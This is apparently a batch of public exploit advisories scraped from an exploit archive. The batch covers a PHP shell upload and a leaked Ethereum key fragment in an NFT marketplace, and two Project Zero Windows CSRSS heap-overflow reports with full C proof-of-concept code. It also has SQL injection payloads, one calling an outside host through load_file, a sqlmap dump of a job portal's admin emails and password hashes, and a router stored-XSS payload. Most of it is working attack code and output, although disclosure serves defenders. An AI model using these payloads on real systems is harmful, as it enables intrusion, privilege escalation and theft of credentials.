<pre><code># Exploit Title: Gigaland NFT marketplace Shell upload and ETH private key leak <br /># Google Dork: N/A<br /># Date: 14/8/2022<br /># Exploit Author: Sohel Yousef https://www.linkedin.com/in/sohel-yousef-50a905189/<br /># Software Link: https://gigaland.io/<br /># Version: 1.9<br /># Category: webapps<br /><br />1. Sell Upload <br /><br />after connectiong your wallet to the site go to edit profile section <br />on the link<br />localhost/artist/account<br />upload your shell in php format with no secuirty <br />your shell well be in this direction<br />storage/artist/profile/ ++ you can Inspect Element the edit profile page to have the direct link <br /><br />2. Private key leak <br /><br />this link <br /><br />localhost//resources/privateJs/transfer.js<br /><br />have the private key for the ethereum account <br /><br />const addressFrom = receiverAddress;<br />const privKey = '9f09d101c +++ HIDDEN ++++++ ac7bea0db0c25d2b5a3'<br /><br />async function transfer(addressto, data, history_id) {<br /><br /> debugger;<br /> const web3js = new Web3(rpcURL);<br /><br /> const contract = new web3js.eth.Contract(trabi, trcontractAddress, {});<br /><br /> const nonce = await web3js.eth.getTransactionCount(addressFrom, 'latest'); //get latest nonce<br /></code></pre>
<pre><code>Windows: heap buffer overflow in sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString<br /><br />## SUMMARY<br />A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.<br /><br /><br />## VULNERABILITY DETAILS<br />```<br />__int64 __fastcall BaseSrvActivationContextCacheDuplicateUnicodeString(UNICODE_STRING *Dst, UNICODE_STRING *Src)<br />{<br /> unsigned int Length; // ebx<br /> SIZE_T NewMaxLength; // r8<br /> WCHAR *Heap; // rax<br /> __int64 Status; // rax<br /><br /> Length = Src->Length;<br /> if ( (_WORD)Length )<br /> {<br /> NewMaxLength = (unsigned __int16)(Length + 2); // *** 1 ***<br /> Dst->MaximumLength = NewMaxLength;<br /> Heap = (WCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, NewMaxLength); // *** 2 ***<br /> Dst->Buffer = Heap;<br /> if ( Heap )<br /> {<br /> memcpy_0(Heap, Src->Buffer, Length); // *** 3 ***<br /> Dst->Buffer[(unsigned __int64)Length >> 1] = 0;<br /> Status = 0i64;<br /> Dst->Length = Length;<br /> }<br /> else<br /> {<br /> return 0xC0000017i64;<br /> }<br /> }<br /> else<br /> {<br /> *(_DWORD *)&Dst->Length = 0;<br /> Status = 0i64;<br /> Dst->Buffer = 0i64;<br /> }<br /> return Status;<br />}<br />```<br /><br />The function above attempts to reserve two extra bytes for a trailing null character. The new size gets truncated to a 16-bit value[1], so if the size of the source string is 0xfffe bytes, the function will try to allocate a 0-byte buffer[2] and copy 0xfffe bytes into it[3].<br /><br />The vulnerable function is reachable from the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine. However, the default size of the CSR shared memory section is only 0x10000 bytes, and some of that space must be reserved for the capture buffer header, so by default it's impossible to pass a big enough `UNICODE_STRING` to CSRSS. Luckily, the size of the section is controlled entirely by the client process, and if an attacker can modify `ntdll!CsrpConnectToServer` early enough during process startup, they'll be able to pass strings of (virtually) any size.<br /><br /><br />## VERSION<br />Windows 11 12H2 (OS Build 22000.593)<br />Windows 10 12H2 (OS Build 19044.1586)<br /><br /><br />## REPRODUCTION CASE<br />This (not very reliable) proof-of-concept creates a new process in a suspended state, attempts to find and replace 32-bit value 0x10000 inside `CsrpConnectToServer`, and resumes the process' main thread. Then the child process sends a CSR request with a huge string.<br /><br /><br />1) Enable page heap verification for csrss.exe:<br />```<br />gflags /p /enable csrss.exe /full<br />```<br /><br />2) Restart the machine.<br /><br />3) Compile and run:<br /><br />```<br />#include <windows.h><br />#include <winternl.h><br />#include <string><br /><br />PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);<br />VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);<br />NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);<br />NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);<br /><br />void CaptureString(LPVOID capture_buffer,<br /> uint8_t* msg_field,<br /> PCWSTR string,<br /> size_t length = 0,<br /> size_t max_length = 0) {<br /> if (length == 0)<br /> length = lstrlenW(string);<br /><br /> CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,<br /> length * 2 + 2, (PSTR)msg_field);<br />}<br /><br />int main(int argc, char* argv[]) {<br /> HMODULE ntdll = LoadLibrary(L\"ntdll\");<br /><br /> if (argc == 1) {<br /> STARTUPINFO si = {0};<br /> PROCESS_INFORMATION pi = {0};<br /><br /> si.cb = sizeof(si);<br /><br /> WCHAR image_path[MAX_PATH + 1];<br /> GetModuleFileName(NULL, image_path, MAX_PATH);<br /><br /> std::wstring args = image_path;<br /> args += L\" child\";<br /> CreateProcess(&image_path[0], &args[0], NULL, NULL, FALSE, CREATE_SUSPENDED,<br /> NULL, NULL, &si, &pi);<br /><br /> PVOID csrClientConnectToServer =<br /> GetProcAddress(ntdll, \"CsrClientConnectToServer\");<br /><br /> size_t offset = 0;<br /> for (; offset < 0x1000; ++offset)<br /> if (*(uint32_t*)((char*)csrClientConnectToServer + offset) == 0x10000)<br /> break;<br /><br /> uint32_t new_size = 0x20000;<br /> WriteProcessMemory(pi.hProcess, (char*)csrClientConnectToServer + offset,<br /> &new_size, sizeof(new_size), NULL);<br /><br /> ResumeThread(pi.hThread);<br /> } else {<br />#define INIT_PROC(name) \\<br /> name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));<br /><br /> INIT_PROC(CsrAllocateCaptureBuffer);<br /> INIT_PROC(CsrFreeCaptureBuffer);<br /> INIT_PROC(CsrClientCallServer);<br /> INIT_PROC(CsrCaptureMessageString);<br /><br /> const size_t HEADER_SIZE = 0x40;<br /> uint8_t msg[HEADER_SIZE + 0x1f8] = {0};<br /><br />#define FIELD(n) msg + HEADER_SIZE + 8 * n<br />#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;<br /><br /> SET_FIELD(0, 0x900000041);<br /> SET_FIELD(3, 0x10101);<br /> SET_FIELD(6, 0x88);<br /> SET_FIELD(7, -1);<br /><br /> std::string manifest =<br /> \"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \"<br /> \"manifestVersion='1.0'>\"<br /> \"<assemblyIdentity name='A' version='1.0.0.0'/>\"<br /> \"</assembly>\";<br /><br /> SET_FIELD(8, manifest.c_str());<br /> SET_FIELD(9, manifest.size());<br /><br /> SET_FIELD(22, 1);<br /><br /> PVOID capture_buffer = CsrAllocateCaptureBuffer(3, 0x10200);<br /><br /> CaptureString(capture_buffer, FIELD(1), L\"\\x00\\x00\", 2);<br /> CaptureString(capture_buffer, FIELD(4), L\"C:\\\\Windows\\\<br />otepad.exe\");<br /> CaptureString(capture_buffer, FIELD(17), L\"C:\\\\A\\\\\");<br /> SET_FIELD(17, 0xfffefffe);<br /><br /> CsrClientCallServer(msg, capture_buffer, 0x1001001e,<br /> sizeof(msg) - HEADER_SIZE);<br /> }<br />}<br />```<br /><br />4) Wait for a crash:<br />```<br />CONTEXT: 000000bd41a3ddc0 -- (.cxr 0xbd41a3ddc0)<br />rax=000002224855c000 rbx=000000000000fffe rcx=000002224855c010<br />rdx=fffffffff7ecde20 rsi=000000bd41a3ec48 rdi=000000000000fffe<br />rip=00007ffbd59d3c53 rsp=000000bd41a3eb08 rbp=000000bd41a3efc8<br /> r8=000000000000002e r9=00000000000003ff r10=000002224855c000<br />r11=0000022240439e1e r12=00000000000007a4 r13=0000000000000001<br />r14=000000bd41a3ee38 r15=000000bd41a3ee20<br />iopl=0 nv up ei pl nz na po nc<br />cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />ntdll!memcpy+0x113:<br />0033:00007ffb`d59d3c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:00000222`4855c000=????????????????????????????????<br />Resetting default scope<br /><br />WRITE_ADDRESS: 000002224855c000 <br /><br />EXCEPTION_RECORD: 000000bd41a3e2b0 -- (.exr 0xbd41a3e2b0)<br />ExceptionAddress: 00007ffbd59d3c53 (ntdll!memcpy+0x0000000000000113)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 0000000000000001<br /> Parameter[1]: 000002224855c000<br />Attempt to write to address 000002224855c000<br /><br />STACK_TEXT: <br />000000bd`41a3eb08 00007ffb`d2f34f24 : 00000000`00000000 00000000`0000fffe 00000000`00000000 00000000`00000000 : ntdll!memcpy+0x113<br />000000bd`41a3eb10 00007ffb`d2f34e4b : 000000bd`41a3ee20 000000bd`41a3ec30 00000000`00000000 00000222`3a760000 : sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString+0x64<br />000000bd`41a3eb40 00007ffb`d2f34d43 : 00000000`00000000 000000bd`41a3ee20 00000222`47868e20 00007ffb`d2d7b8b4 : sxssrv!BaseSrvActivationContextCacheDuplicateKey+0x4b<br />000000bd`41a3eb70 00007ffb`d2f34916 : 000000bd`41a3ed78 000000bd`41a3ee20 000000bd`41a3efd4 000000bd`41a3efe0 : sxssrv!BaseSrvActivationContextCacheCreateEntry+0x83<br />000000bd`41a3ebd0 00007ffb`d2f34018 : 00000000`00000000 00000000`00000000 00000000`00000000 000000bd`41a3f410 : sxssrv!BaseSrvActivationContextCacheInsertEntry+0x86<br />000000bd`41a3ed20 00007ffb`d2f31dce : 00000000`000007f4 00000000`000000f0 00000000`00010244 00000000`00000000 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x818<br />000000bd`41a3f160 00007ffb`d2fb6490 : 00000222`3d0d0750 00000000`000000f0 00000222`4785ef30 00000222`3a877f80 : sxssrv!BaseSrvSxsCreateActivationContextFromMessage+0x32e<br />000000bd`41a3f2d0 00007ffb`d598265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0<br />000000bd`41a3f970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f<br />```<br /><br /><br />## CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />**This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-07-19.**<br /><br />Related CVE Numbers: CVE-2022-22049,CVE-2022-22049.<br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity<br /><br />## SUMMARY<br />A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.<br /><br /><br />## VULNERABILITY DETAILS<br />In 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`.<br /><br />We've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`.<br /><br />1. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html<br /><br /><br />## VERSION<br />Windows 11 12H2 (OS Build 22000.593)<br />Windows 10 12H2 (OS Build 19044.1586)<br /><br /><br />## REPRODUCTION CASE<br />1) Enable page heap verification for csrss.exe:<br />```<br />gflags /p /enable csrss.exe /full<br />```<br /><br />2) Restart the machine.<br /><br />3) Compile and run:<br />```<br />#pragma comment(lib, "ntdll")<br /><br />#include <windows.h><br />#include <winternl.h><br />#include <cstdint><br />#include <cstdio><br />#include <string><br /><br />typedef struct _SECTION_IMAGE_INFORMATION {<br /> PVOID EntryPoint;<br /> ULONG StackZeroBits;<br /> ULONG StackReserved;<br /> ULONG StackCommit;<br /> ULONG ImageSubsystem;<br /> WORD SubSystemVersionLow;<br /> WORD SubSystemVersionHigh;<br /> ULONG Unknown1;<br /> ULONG ImageCharacteristics;<br /> ULONG ImageMachineType;<br /> ULONG Unknown2[3];<br />} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;<br /><br />typedef struct _RTL_USER_PROCESS_INFORMATION {<br /> ULONG Size;<br /> HANDLE ProcessHandle;<br /> HANDLE ThreadHandle;<br /> CLIENT_ID ClientId;<br /> SECTION_IMAGE_INFORMATION ImageInformation;<br /> BYTE Unknown1[128];<br />} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;<br /><br />NTSTATUS(NTAPI* RtlCreateProcessParameters)<br />(PRTL_USER_PROCESS_PARAMETERS*,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PVOID,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING,<br /> PUNICODE_STRING);<br />NTSTATUS(NTAPI* RtlCreateUserProcess)<br />(PUNICODE_STRING,<br /> ULONG,<br /> PRTL_USER_PROCESS_PARAMETERS,<br /> PSECURITY_DESCRIPTOR,<br /> PSECURITY_DESCRIPTOR,<br /> HANDLE,<br /> BOOLEAN,<br /> HANDLE,<br /> HANDLE,<br /> PRTL_USER_PROCESS_INFORMATION);<br /><br />PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);<br />VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);<br />NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);<br />NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);<br /><br />void CaptureString(LPVOID capture_buffer,<br /> uint8_t* msg_field,<br /> PCWSTR string,<br /> size_t length = 0) {<br /> if (length == 0)<br /> length = lstrlenW(string);<br /><br /> CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,<br /> length * 2 + 2, (PSTR)msg_field);<br />}<br /><br />int main() {<br /> HMODULE ntdll = LoadLibrary(L"ntdll");<br /><br />#define INIT_PROC(name) \<br /> name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));<br /><br /> INIT_PROC(RtlCreateProcessParameters);<br /> INIT_PROC(RtlCreateUserProcess);<br /><br /> INIT_PROC(CsrAllocateCaptureBuffer);<br /> INIT_PROC(CsrFreeCaptureBuffer);<br /> INIT_PROC(CsrClientCallServer);<br /> INIT_PROC(CsrCaptureMessageString);<br /><br /> UNICODE_STRING image_path;<br /> PRTL_USER_PROCESS_PARAMETERS proc_params;<br /> RTL_USER_PROCESS_INFORMATION proc_info = {0};<br /><br /> RtlInitUnicodeString(&image_path, L"\\SystemRoot\\notepad.exe");<br /> RtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL,<br /> NULL, NULL, NULL, NULL);<br /> RtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL,<br /> NULL, NULL, FALSE, NULL, NULL, &proc_info);<br /><br /> const size_t HEADER_SIZE = 0x40;<br /> uint8_t msg[HEADER_SIZE + 0x1f8] = {0};<br /><br />#define FIELD(n) msg + HEADER_SIZE + 8 * n<br />#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;<br /><br /> SET_FIELD(2, proc_info.ClientId.UniqueProcess);<br /> SET_FIELD(3, proc_info.ClientId.UniqueThread);<br /><br /> SET_FIELD(4, -1);<br /> SET_FIELD(7, 1);<br /> SET_FIELD(8, 0x20000);<br /><br /> std::string manifest =<br /> "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' "<br /> "manifestVersion='1.0'>"<br /> "<assemblyIdentity name='@' version='1.0.0.0'/>"<br /> "</assembly>";<br /> manifest.replace(manifest.find('@'), 1, 0x4000, 'A');<br /><br /> SET_FIELD(13, manifest.c_str());<br /> SET_FIELD(14, manifest.size());<br /><br /> PVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200);<br /><br /> CaptureString(capture_buffer, FIELD(22), L"C:\\Windows\\");<br /> CaptureString(capture_buffer, FIELD(24), L"\x00\x00", 2);<br /> CaptureString(capture_buffer, FIELD(28), L"A");<br /> SET_FIELD(28, 0xff000002);<br /><br /> CsrClientCallServer(msg, capture_buffer, 0x1001001d,<br /> sizeof(msg) - HEADER_SIZE);<br />}<br />```<br /><br />The crash should look like to the following:<br />```<br />CONTEXT: 0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0)<br />rax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010<br />rdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001<br />rip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80<br /> r8=0000000000000032 r9=00000000000001f7 r10=00007ff822e6b558<br />r11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001<br />r14=0000000000000000 r15=0000000000000005<br />iopl=0 nv up ei pl nz na pe nc<br />cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />ntdll!memcpy+0x113:<br />0033:00007ff8`25a53c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=????????????????????????????????<br />Resetting default scope<br /><br />WRITE_ADDRESS: 0000020e6515d000<br /><br />EXCEPTION_RECORD: 0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0)<br />ExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 0000000000000001<br /> Parameter[1]: 0000020e6515d000<br />Attempt to write to address 0000020e6515d000<br /><br />STACK_TEXT:<br />0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x113<br />0000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c1<br />0000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd34<br />0000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d6<br />0000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x513<br />0000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x104<br />0000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe<br />0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x339<br />0000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed<br />0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x545<br />0000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x71<br />0000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f3<br />0000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0<br />0000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f<br />```<br /><br /><br />## CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />Related CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026.<br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS<br />## Author: nu11secur1ty<br />## Date: 08.12.2022<br />## Vendor Homepage: https://www.mayurik.com/#download_section<br />## Software Link-0:<br />https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html<br />## Software Link-1:<br />https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip<br /><br /><br />## Description:<br />The Gas Agency Management-2022 by Mayuri K suffers from multiple<br />vulnerabilities, which means this project must be deprecated<br />immediately!<br /><br />1. - SQLi: the parameter username is vulnerable to time-based blind<br />(query SLEEP) injection - not sanitizing well.<br />2. - Unauthenticated file upload - not sanitizing upload function -<br />possible to upload .php extension files on photo section, for the<br />customers.<br />3. - XSS-reflected in the section adds customer in address function.<br />4. - Web shell file upload - unauthenticated extension file upload, in<br />this case, is PHP web shell uploader. After this, the malicious user<br />can execute the already uploaded file remotely, and he can destroy<br />completely this flawed system.<br />5. - STATUS: For termination of the project.<br /><br />[+]Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=mxiusQzi'+(select<br />load_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+''<br />AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)--<br />FygL&password=r8H!r2a!U2&login=<br />---<br />```<br />[+]Unauthenticated Upload:<br />- - - in the video:https://streamable.com/opqz3n<br /><br />[+]XSS-Reflected:<br />- - - in the video:https://streamable.com/opqz3n<br /><br />[+]RCE:<br />- - - in the video:https://streamable.com/opqz3n<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/opqz3n)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : i-netsolution.com │ │ │<br />│ Vendor : i-Net Solution │ │ │<br />│ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves │<br />│ Vuln Type: Remote SQL Injection │ │ as a bridge between employers │<br />│ Method : GET │ │ and job seekers │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> <br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'salary_to' is vulnerable.<br /><br />---<br />Parameter: salary_to (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437<br />---<br /><br />[+] Starting the Attack<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br /><br /><br />[INFO] fetching current database<br />current database: 'theminsall_jobportal_db'<br /><br /><br />[INFO] fetching tables for database: 'theminsall_jobportal_db'<br /><br />Database: theminsall_jobportal_db<br />[72 tables]<br />+----------------------------------+<br />| admin_password_resets |<br />| admins |<br />| applicant_messages |<br />| blog_categories |<br />| blogs |<br />| career_levels |<br />| cities |<br />| cms |<br />| cms_content |<br />| companies |<br />| company_messages |<br />| company_password_resets |<br />| contact_messages |<br />| countries |<br />| countries_details |<br />| degree_levels |<br />| degree_types |<br />| failed_jobs |<br />| faqs |<br />| favourite_applicants |<br />| favourites_company |<br />| favourites_job |<br />| functional_areas |<br />| genders |<br />| industries |<br />| job_alerts |<br />| job_apply |<br />| job_apply_rejected |<br />| job_experiences |<br />| job_shifts |<br />| job_skills |<br />| job_titles |<br />| job_types |<br />| jobs |<br />| language_levels |<br />| languages |<br />| major_subjects |<br />| manage_job_skills |<br />| marital_statuses |<br />| migrations |<br />| ownership_types |<br />| packages |<br />| password_resets |<br />| payu_transactions |<br />| profile_cvs |<br />| profile_education_major_subjects |<br />| profile_educations |<br />| profile_experiences |<br />| profile_languages |<br />| profile_projects |<br />| profile_skills |<br />| profile_summaries |<br />| queue_jobs |<br />| report_abuse_company_messages |<br />| report_abuse_messages |<br />| result_types |<br />| roles |<br />| salary_periods |<br />| send_to_friend_messages |<br />| seo |<br />| site_settings |<br />| sliders |<br />| states |<br />| subscriptions |<br />| testimonials |<br />| unlocked_users |<br />| user_messages |<br />| users |<br />| videos |<br />| widget_pages |<br />| widgets |<br />| widgets_data |<br />+----------------------------------+<br /><br /><br />[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'<br /><br />Database: theminsall_jobportal_db<br />Table: admins<br />[8 columns]<br />+----------------+------------------+<br />| Column | Type |<br />+----------------+------------------+<br />| created_at | timestamp |<br />| email | varchar(191) |<br />| id | int(10) unsigned |<br />| name | varchar(191) |<br />| password | varchar(191) |<br />| remember_token | varchar(100) |<br />| role_id | int(11) |<br />| updated_at | timestamp |<br />+----------------+------------------+<br /><br /><br />[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'<br /><br />Database: theminsall_jobportal_db<br />Table: admins<br />[3 entries]<br />+----+--------------------+--------------------------------------------------------------+-----------+<br />| id | email | password | name |<br />+----+--------------------+--------------------------------------------------------------+-----------+<br />| 3 | buyer@buyer.com | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer |<br />| 4 | sub@jobsportal.com | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |<br />| 5 | admin@gmail.com | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin |<br />+----+--------------------+--------------------------------------------------------------+-----------+<br /> Possible Algorithms: bcrypt $2*$, Blowfish (Unix)<br /><br /><br />[-] Done<br /><br /></code></pre>
<pre><code># Exploit Title: FiberHome - AN5506-02-B - RP2521 - Authenticated Stored XSS<br /># Date: 10/08/2022<br /># Exploit Author: Leonardo Goncalves<br /># Version: Firmware RP2521<br /><br />1) Log in the equipment via your web browser<br />2) Go to Network > auth_settings<br />3) In the "sncfg_loid" inject the payload "<script>alert()</script>"<br />4) Click Save<br />5) Exploit!<br /></code></pre>
